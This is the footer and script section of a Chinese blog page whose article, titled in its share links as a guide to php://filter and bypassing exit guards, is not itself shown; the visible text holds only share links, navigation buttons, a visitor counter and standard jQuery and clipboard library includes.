    <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/05/23/%E8%AF%A6%E8%A7%A3php-filter%E4%BB%A5%E5%8F%8A%E6%AD%BB%E4%BA%A1%E7%BB%95%E8%BF%87/&text=详解php://filter以及死亡绕过"><i
                    class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
    <li><a class="icon" href="mailto:?subject=详解php://filter以及死亡绕过&body=Check out this article: http://example.com/2021/05/23/%E8%AF%A6%E8%A7%A3php-filter%E4%BB%A5%E5%8F%8A%E6%AD%BB%E4%BA%A1%E7%BB%95%E8%BF%87/"><i
                    class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
</ul>
        </div>

        <div id="actions-footer">
            <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i
                        class="fas fa-bars fa-lg"
                        aria-hidden="true"></i> Menu</a>
            <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i
                        class="fas fa-list fa-lg"
                        aria-hidden="true"></i> TOC</a>
            <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i
                        class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
            <a id="top" style="display:none" class="icon" href="#"
               onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg"
                                                                               aria-hidden="true"></i> Top
            </a>
        </div>

    </div>
</div>
    
    <footer id="footer">
  <div class="footer-top">
    &copy; 2021 <i class="fas fa-heart"></i>
    John Doe 
    <a href="http://www.beian.miit.gov.cn/" target="_blank">湘ICP备17005082号</a>
    
  </div>

  <div class="footer-bottom">
    
    <!-- tongji -->
    <script
      async
      src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"
    ></script>
    <span class="site-uv">
      <i class="fa fa-user"></i> 访问人数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
    <span class="site-pv">
      <i class="fa fa-eye"></i> 访问总量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
    <br />
      本网站由
    <a href="https://www.upyun.com/?utm_source=lianmeng&utm_medium=referral" target="_blank">
       又拍云 
    </a>
    提供CDN加速/云存储服务 
  </div>
</footer>

</div>
<!-- styles -->

<link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/5.12.1/css/all.min.css">


<link rel="stylesheet" href="https://cdn.staticfile.org/justifiedGallery/3.7.0/css/justifiedGallery.min.css">

<!-- jquery -->

<script src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js"></script>


<script src="https://cdn.staticfile.org/justifiedGallery/3.7.0/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

    
<script src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js"></script>

    <script type="text/javascript">
        $(function () {
            // copy-btn HTML
            var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
            btn += '<i class="far fa-clone"></i>';
            btn += '</span>';
            // mount it!
            $(".highlight .code pre").before(btn);
            var clip = new ClipboardJS('.btn-copy', {
                target: function (trigger) {
                    return trigger.nextElementSibling;
                }
            });
            clip.on('success', function (e) {
                e.trigger.setAttribute('aria-label', "Copied!");
                e.clearSelection();
            })
        })
    </script>


<script src="/js/main.js"></script>

<!-- search -->

</body>

</html>